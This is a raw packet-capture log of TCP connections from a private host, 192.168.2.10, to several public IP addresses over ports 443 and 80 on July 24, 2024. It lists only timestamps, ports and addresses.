Jul 24, 2024 19:56:38.489054918 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.489069939 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.489124060 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.489130974 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.489492893 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.491986036 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.492002010 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.492068052 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.492075920 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.492943048 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.492968082 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.493000031 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.493006945 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.493035078 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.493061066 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.493422031 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.493438005 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.493508101 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.493515015 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.494333982 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.494340897 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.566973925 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.567008972 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.567111015 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.567132950 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.570326090 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.575347900 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.575412035 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.575462103 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.575473070 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.575514078 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.575525999 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.575808048 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.575860977 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.575886011 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.575891018 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.575921059 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.575937033 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.576405048 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.576452971 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.576487064 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.576493025 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.576522112 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.576533079 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.579009056 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.579054117 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.579087019 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.579092979 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.579122066 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.579140902 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.579416037 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.579471111 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.579492092 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.579498053 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.579524040 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.579535007 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.580085039 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.580128908 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.580153942 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.580158949 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.580184937 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.580192089 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.580511093 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.580547094 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.580578089 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.580584049 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.580607891 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.580715895 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.581126928 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.653949022 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.654011011 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.654064894 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.654083014 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.654119015 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.654130936 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.661561966 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.661619902 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.661668062 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.661684036 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.661701918 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.661725044 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.663404942 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.663460016 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.663489103 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.663497925 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.663521051 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.663537979 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.663991928 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.664032936 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.664060116 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.664064884 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.664093018 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.664107084 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.667454958 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.667506933 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.667571068 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.667588949 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.667603016 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.667629004 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.667823076 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.667866945 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.667972088 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.667978048 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.668704987 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.668756008 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.668778896 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.668783903 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.668812037 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.668838978 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.668867111 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.668912888 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.668940067 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.668945074 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.668971062 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.668986082 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.673358917 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.767687082 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.767709970 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.767839909 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.767852068 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.768256903 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.768277884 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.768315077 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.768321037 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.768332958 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.768337965 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.768352985 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.768367052 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.768371105 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.768399954 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.768429041 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.769665003 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.769680023 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.769718885 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.769723892 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.769735098 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.769758940 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.769798040 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.769812107 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.769853115 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.769857883 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.769882917 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.769897938 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.770618916 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.770633936 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.770678043 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.770704031 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.770709038 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.770741940 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.770757914 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.770802021 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.772722960 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.814235926 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.814259052 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:38.814281940 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:38.814289093 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:39.526628971 CEST	49740	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:39.531711102 CEST	80	49740	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:39.531814098 CEST	49740	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:39.531964064 CEST	49740	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:39.531994104 CEST	49740	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:39.536940098 CEST	80	49740	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:39.537400007 CEST	80	49740	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:40.167171955 CEST	443	49739	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:40.167365074 CEST	443	49739	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:40.167552948 CEST	49739	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:40.184186935 CEST	49739	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:40.184232950 CEST	443	49739	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:40.184248924 CEST	49739	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:40.184256077 CEST	443	49739	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:40.293328047 CEST	49741	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:40.293390036 CEST	443	49741	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:40.293461084 CEST	49741	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:40.293987036 CEST	49741	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:40.294007063 CEST	443	49741	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:40.621087074 CEST	80	49740	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:40.621234894 CEST	80	49740	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:40.621325970 CEST	49740	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:40.621423960 CEST	49740	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:40.624356985 CEST	49742	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:40.627751112 CEST	80	49740	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:40.629362106 CEST	80	49742	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:40.629456997 CEST	49742	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:40.629564047 CEST	49742	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:40.629585028 CEST	49742	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:40.634773016 CEST	80	49742	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:40.635150909 CEST	80	49742	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:40.965226889 CEST	443	49741	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:40.965502024 CEST	49741	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:40.967993975 CEST	49741	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:40.968007088 CEST	443	49741	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:40.968067884 CEST	49741	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:40.968071938 CEST	443	49741	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:40.968272924 CEST	443	49741	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:40.968413115 CEST	49741	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:41.012501001 CEST	443	49741	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:41.775023937 CEST	80	49742	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:41.779599905 CEST	80	49742	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:41.779666901 CEST	49742	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:41.782165051 CEST	49742	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:41.788566113 CEST	80	49742	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:41.920511007 CEST	49743	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:41.934794903 CEST	80	49743	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:41.935538054 CEST	49743	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:41.935538054 CEST	49743	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:41.935538054 CEST	49743	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:41.945970058 CEST	80	49743	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:41.946013927 CEST	80	49743	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:42.297137976 CEST	443	49741	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:42.297230005 CEST	443	49741	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:42.297283888 CEST	49741	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:42.314600945 CEST	49741	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:42.314627886 CEST	443	49741	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:42.314743996 CEST	49741	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:42.314754963 CEST	443	49741	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:42.427928925 CEST	49744	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:42.427978992 CEST	443	49744	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:42.428102016 CEST	49744	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:42.428595066 CEST	49744	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:42.428613901 CEST	443	49744	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:43.052568913 CEST	80	49743	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:43.052704096 CEST	80	49743	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:43.052937984 CEST	49743	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:43.053108931 CEST	49743	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:43.059340954 CEST	80	49743	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:43.126765966 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:43.126795053 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:43.126879930 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:43.127332926 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:43.127338886 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:43.185370922 CEST	443	49744	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:43.185514927 CEST	49744	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:43.188106060 CEST	49744	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:43.188117981 CEST	443	49744	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:43.188390017 CEST	49744	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:43.188395023 CEST	443	49744	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:43.188457012 CEST	443	49744	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:43.188632011 CEST	49744	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:43.236504078 CEST	443	49744	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:43.849370003 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:43.849453926 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:43.874382973 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:43.874408007 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:43.875420094 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:43.876390934 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:43.916508913 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.101747990 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.155008078 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.166209936 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.166225910 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.166258097 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.166280985 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.166301012 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.166388988 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.166415930 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.166454077 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.166491032 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.197709084 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.197890997 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.197918892 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.201350927 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.201376915 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.201479912 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.201503992 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.201512098 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.236821890 CEST	443	49744	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:44.236912012 CEST	443	49744	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:44.236988068 CEST	49744	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:44.248727083 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.278915882 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.278959990 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.279062986 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.279079914 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.279131889 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.279150963 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.281228065 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.281245947 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.281306028 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.281316996 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.281377077 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.286011934 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.286031008 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.286098957 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.286113977 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.286138058 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.286169052 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.307902098 CEST	49744	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:44.307938099 CEST	443	49744	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:44.307965994 CEST	49744	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:44.307974100 CEST	443	49744	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:44.323575974 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.323601007 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.323740005 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.323755980 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.323810101 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.367688894 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.367722034 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.367851019 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.367877960 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.367933035 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.368158102 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.368184090 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.368216991 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.368226051 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.368237972 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.368252039 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.368275881 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.368280888 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.368310928 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.368350029 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.374582052 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.374609947 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.374624968 CEST	49745	443	192.168.2.10	162.0.235.84
Jul 24, 2024 19:56:44.374631882 CEST	443	49745	162.0.235.84	192.168.2.10
Jul 24, 2024 19:56:44.421289921 CEST	49746	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:44.421345949 CEST	443	49746	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:44.421509027 CEST	49746	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:44.421966076 CEST	49746	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:44.421978951 CEST	443	49746	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:44.431926966 CEST	49747	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:44.438999891 CEST	80	49747	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:44.439111948 CEST	49747	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:44.439362049 CEST	49747	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:44.439431906 CEST	49747	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:44.444395065 CEST	80	49747	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:44.444509983 CEST	80	49747	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:45.048211098 CEST	443	49746	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:45.048288107 CEST	49746	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:45.051018000 CEST	49746	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:45.051028967 CEST	443	49746	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:45.051081896 CEST	49746	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:45.051085949 CEST	443	49746	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:45.051131964 CEST	49746	443	192.168.2.10	107.173.160.137
